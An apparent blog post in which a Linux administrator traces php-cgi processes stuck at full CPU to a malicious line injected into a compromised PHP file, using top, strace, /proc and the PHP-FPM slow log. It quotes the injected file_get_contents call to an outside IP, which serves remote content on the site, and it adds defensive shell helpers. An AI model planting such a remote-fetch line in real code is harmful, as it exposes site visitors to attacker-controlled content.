Tracking down php-cgi processes stuck at 100% CPU on Linux

Source: Internet
Author: User
Tags fpm socket

First, some background on our site's architecture. Traffic is not very large at present, but because the company has recently been promoting the website, we moved from a single server to a setup with Nginx at the front end doing load balancing across two Web servers. All Web pages and static files are served from an NFS share, with the NFS service installed on one of the two Web servers, and the back end is a typical MySQL master-slave setup.

Only two days after switching to this architecture, we received a Nagios alert showing that the load on one Web server was high. I logged in to the server with SecureCRT and ran top, which showed several php-cgi processes consuming a large amount of CPU:

13889 www  0 228m 14m 9344 S 100.4 0.1 14:51.22 php-cgi
13882 www  0 227m 13m 9284 S 100.1 0.1 10:53.18 php-cgi
13924 www  0 227m 9936 5732 S 100.1 0.1 23:20.80 php-cgi
13927 www  0 226m 5228 2064 R 100.1 0.0 24:44.24 php-cgi
13827 www  0 228m 15m 10m R 99.7 0.1 12:57.60 php-cgi
13900 www 25  0 228m 19m 13m R 99.7 0.1  9:03.09 php-cgi
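
The same check can be scripted rather than read off an interactive top session. The filter below is a minimal sketch, assuming procps `ps` is available; the function name `filter_busy` and the 90% threshold in the usage line are illustrative and not part of the original setup. Note that `ps` reports CPU averaged over the lifetime of the process, so its figures can be lower than the instantaneous values top shows.

```shell
# filter_busy NAME LIMIT
# Reads "pid pcpu etime comm" rows on stdin and prints "pid pcpu etime"
# for rows whose command name equals NAME and whose CPU percentage
# is at least LIMIT.
filter_busy() {
    awk -v name="$1" -v limit="$2" \
        '$4 == name && ($2 + 0) >= (limit + 0) { print $1, $2, $3 }'
}
```

Possible usage: `ps -eo pid,pcpu,etime,comm --no-headers | filter_busy php-cgi 90`.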

The output above shows that these php-cgi processes not only use a lot of CPU but have also been running for a very long time. A php-cgi process normally handles a request and finishes quickly, so why have these run so long without being released? To see what one of the long-running processes was doing, I ran ls -l /proc/13827/fd/, with the following result:

lrwx------ 1 www www Dec 11 12:03 0 -> socket:[68444030]
l-wx------ 1 www www Dec 11 12:03 1 -> pipe:[68444057]
l-wx------ 1 www www Dec 11 12:03 2 -> pipe:[68444058]
lrwx------ 1 www www Dec 11 12:03 3 -> socket:[68468225]
lrwx------ 1 www www Dec 11 12:03 4 -> socket:[68469788]
lrwx------ 1 www www Dec 11 12:03 5 -> socket:[68457928]
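
For a process with many descriptors, a per-type count is quicker to read than the full listing. The sketch below is one way to produce it, assuming the link targets are fed in one per line; the function name `summarize_fds` is made up for this example.

```shell
# summarize_fds
# Reads file-descriptor link targets on stdin (one per line, as printed
# by readlink on /proc/PID/fd/*) and prints a count per target type.
summarize_fds() {
    awk '
        /^socket:/ { sockets++; next }
        /^pipe:/   { pipes++;   next }
        /^\//      { files++;   next }
                   { other++ }
        END {
            printf "sockets=%d pipes=%d files=%d other=%d\n",
                   sockets, pipes, files, other
        }'
}
```

Possible usage, run as root or as the process owner: `for fd in /proc/13827/fd/*; do readlink "$fd"; done | summarize_fds`. For the six descriptors listed above this gives `sockets=4 pipes=2 files=0 other=0`.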

No regular files are open for reading or writing, so the process does not appear to be doing any file I/O, which is rather strange. Next I attached strace to see what the process was actually doing:

strace -p 13827
poll([{fd=4, events=POLLIN}], 1, 0)   = 0 (Timeout)
select(5, [4], [4], [], {15, 0})    = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0)   = 0 (Timeout)
select(5, [4], [4], [], {15, 0})    = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0)   = 0 (Timeout)
select(5, [4], [4], [], {15, 0})    = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0)   = 0 (Timeout)
select(5, [4], [4], [], {15, 0})    = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0)   = 0 (Timeout)
select(5, [4], [4], [], {15, 0})    = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0)   = 0 (Timeout)
select(5, [4], [4], [], {15, 0})    = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0)   = 0 (Timeout)
....
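
With a trace this repetitive, a count per system call is easier to read than the raw output. The helper below is a rough sketch that tallies call names from strace text on standard input; the name `count_syscalls` is invented for this example. strace also has a built-in summary mode, `strace -c`, which may be preferable when it is enough.

```shell
# count_syscalls
# Reads strace output on stdin and prints "count name" for every system
# call seen, most frequent first. Lines that do not start with a call
# name followed by "(" (for example strace's own messages) are ignored.
count_syscalls() {
    awk '
        /^[a-z_0-9]+\(/ {
            name = $0
            sub(/\(.*/, "", name)   # keep only the text before the first "("
            calls[name]++
        }
        END { for (name in calls) print calls[name], name }' | sort -rn
}
```

Possible usage: `timeout 5 strace -p 13827 2>&1 | count_syscalls` (strace writes its trace to standard error, hence the redirection).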

The process is clearly spinning: the same poll call times out again and again. But why does it keep timing out? The php-cgi logs were the next place to look. The original php-fpm.conf had the timeout set to 0, meaning no timeout at all. I set the timeout in php-fpm.conf to 5s and had slow php-cgi requests recorded in a PHP slow log, with the following values:

3s
logs/slow.log

After making the change, I restarted PHP-FPM with /usr/local/php/sbin/php-fpm restart. slow.log then filled up with many entries like the following:

script_filename = /data/htdocs/bbs.hrloo.com/apl.php
[0x00007fffb060fd70] file_get_contents() /data/htdocs/bbs.hrloo.com/apl.php:10
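
When the slow log holds many entries, it helps to see which stack frame shows up most often. The function below is a small sketch for that, assuming frames are logged one per line with a leading `[0x...]` address as in the excerpt above; the name `count_slow_frames` is hypothetical.

```shell
# count_slow_frames
# Reads a PHP-FPM slow log on stdin and prints "count frame" for every
# distinct stack frame line (lines starting with a [0x...] address),
# most frequent first. The address itself is dropped before counting.
count_slow_frames() {
    awk '
        /^\[0[xX][0-9a-fA-F]+\]/ {
            $1 = ""            # drop the address field
            sub(/^ +/, "")     # and the separator left behind
            frames[$0]++
        }
        END { for (f in frames) print frames[f], f }' | sort -rn
}
```

Possible usage: `count_slow_frames < logs/slow.log | head`.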

Line 10 of /data/htdocs/bbs.hrloo.com/apl.php reads:

echo file_get_contents('http://121.10.108.227:86/yh.asp');

Searching online, I found reports that when the remote site responds very slowly, this PHP function can drive CPU usage very high and stay stuck indefinitely without timing out. The URL itself points to a novel-reading site, so the call had been injected by someone who compromised the site. After I restored the original file, everything returned to normal. Oddly, the Web server that hosts the NFS share did not show the problem; it seems the failure appeared on the other server because the remote site was slow and access over NFS was slower still. In a way we should be thankful for the failure, because it exposed a serious security problem.
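
Since one injected call was found, it is worth checking whether other PHP files fetch remote URLs the same way. The search below is only a sketch, assuming GNU grep (for `-r` and `--include`); the function name `find_remote_fetches` is invented here, and the pattern only catches literal URLs passed directly to file_get_contents, so obfuscated injections will slip past it.

```shell
# find_remote_fetches DIR
# Recursively lists "file:line:text" for PHP files under DIR that call
# file_get_contents() with a literal http:// or https:// URL.
find_remote_fetches() {
    grep -rnE --include='*.php' \
        "file_get_contents *\( *['\"]https?://" "$1"
}
```

Possible usage: `find_remote_fetches /data/htdocs`. Legitimate remote calls will be listed too, so each hit still needs a manual look.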

The failure has been fixed, but the problem is far from resolved. The priority now is to find out how the file was modified so that similar incidents can be prevented. There is clearly a lot of work still to do.
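
One possible starting point for that investigation is to list PHP files that changed recently. The helper below is a minimal sketch using find; the function name `recent_php` and the 7-day window in the usage line are assumptions for illustration. Modification times can be reset by an attacker, so an empty result does not prove the tree is clean.

```shell
# recent_php DIR DAYS
# Lists PHP files under DIR whose modification time is less than
# DAYS days old, sorted by path.
recent_php() {
    find "$1" -type f -name '*.php' -mtime "-$2" | sort
}
```

Possible usage: `recent_php /data/htdocs 7`. Comparing the listed files against a known-good copy or a backup would then show what was actually changed.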
